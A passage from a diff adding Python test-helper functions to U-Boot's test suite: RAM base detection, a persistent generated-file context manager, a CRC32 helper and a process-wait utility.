int(l.split('=')[1].strip(), 16) + break + if ram_base is None: + ram_base = -1 + raise Exception('Failed to find RAM bank start in `bdinfo`') + + # We don't want ram_base to be zero as some functions test if the given + # address is NULL (0). Besides, on some RISC-V targets the low memory + # is protected that prevents S-mode U-Boot from access. + # Let's add 2MiB then (size of an ARM LPAE/v8 section). + + ram_base += 1024 * 1024 * 2 + + return ram_base + +class PersistentFileHelperCtxMgr(object): + """A context manager for Python's "with" statement, which ensures that any + generated file is deleted (and hence regenerated) if its mtime is older + than the mtime of the Python module which generated it, and gets an mtime + newer than the mtime of the Python module which generated after it is + generated. Objects of this type should be created by factory function + persistent_file_helper rather than directly.""" + + def __init__(self, log, filename): + """Initialize a new object. + + Args: + log: The Logfile object to log to. + filename: The filename of the generated file. + + Returns: + Nothing. + """ + + self.log = log + self.filename = filename + + def __enter__(self): + frame = inspect.stack()[1] + module = inspect.getmodule(frame[0]) + self.module_filename = module.__file__ + self.module_timestamp = os.path.getmtime(self.module_filename) + + if os.path.exists(self.filename): + filename_timestamp = os.path.getmtime(self.filename) + if filename_timestamp < self.module_timestamp: + self.log.action('Removing stale generated file ' + + self.filename) + pathlib.Path(self.filename).unlink() + + def __exit__(self, extype, value, traceback): + if extype: + try: + pathlib.Path(self.filename).unlink() + except Exception: + pass + return + logged = False + for _ in range(20): + filename_timestamp = os.path.getmtime(self.filename) + if filename_timestamp > self.module_timestamp: + break + if not logged: + self.log.action( + 'Waiting for generated file timestamp to increase') + logged = True + os.utime(self.filename) + time.sleep(0.1) + +def persistent_file_helper(u_boot_log, filename): + """Manage the timestamps and regeneration of a persistent generated + file. This function creates a context manager for Python's "with" + statement + + Usage: + with persistent_file_helper(u_boot_console.log, filename): + code to generate the file, if it's missing. + + Args: + u_boot_log: u_boot_console.log. + filename: The filename of the generated file. + + Returns: + A context manager object. + """ + + return PersistentFileHelperCtxMgr(u_boot_log, filename) + +def crc32(u_boot_console, address, count): + """Helper function used to compute the CRC32 value of a section of RAM. + + Args: + u_boot_console: A U-Boot console connection. + address: Address where data starts. + count: Amount of data to use for calculation. + + Returns: + CRC32 value + """ + + bcfg = u_boot_console.config.buildconfig + has_cmd_crc32 = bcfg.get('config_cmd_crc32', 'n') == 'y' + assert has_cmd_crc32, 'Cannot compute crc32 without CONFIG_CMD_CRC32.' + output = u_boot_console.run_command('crc32 %08x %x' % (address, count)) + + m = re.search('==> ([0-9a-fA-F]{8})$', output) + assert m, 'CRC32 operation failed.' + + return m.group(1) + +def waitpid(pid, timeout=60, kill=False): + """Wait a process to terminate by its PID + + This is an alternative to a os.waitpid(pid, 0) call that works on + processes that aren't children of the python process. + + Args: + pid: PID of a running process. + timeout: Time in seconds to wait. + kill: Whether to forcibly kill the process after timeout. + + Returns: + True, if the process ended on its own. + False, if the process was killed by this function. + + Raises: + TimeoutError, if the process is still running after timeout. + """ + try: + for _ in range(timeout): + os.kill(pid, 0) + time.sleep(1) + + if kill: + os.kill(pid, signal.SIGKILL) + return False + + except ProcessLookupError: + return True + + raise TimeoutError( + "Process with PID {} did not terminate after {} seconds." + .format(pid, timeout) + ) |